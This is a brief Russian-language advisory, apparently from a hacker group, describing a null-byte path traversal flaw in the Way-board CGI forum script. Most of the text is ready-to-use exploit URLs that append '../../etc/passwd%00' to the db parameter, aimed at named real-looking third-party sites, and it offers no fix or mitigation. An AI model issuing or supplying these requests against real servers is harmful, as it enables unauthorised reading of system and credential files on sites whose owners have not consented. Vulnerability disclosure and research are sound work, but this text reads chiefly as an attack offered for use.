-----------UkR security team advisory ------------

Название: Уязвимость "show file", связанная с перловским багом null bite.

Проблема: Way-board - Это популярная корейская борда (http://way.co.kr - официальный сайт). С помощью этого бага вы сможете просматривать любые файлы, баг работает на любой системе,где perl установлен."%00" - символ конца строки, используемый в C, C++ и perl

Использование:
http://www.victim.com/way-board/way-board.cgi?db=урл_до_любого_файла
Пример:
http://www.kuwu.or.kr/way-board/way-board.cgi?db=../../../../../../../../etc/passwd%00

http://hanbando.net/way-board/way-board.cgi?db=../../../../../../../../etc/passwd%00
Автор: UKR-XblP

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии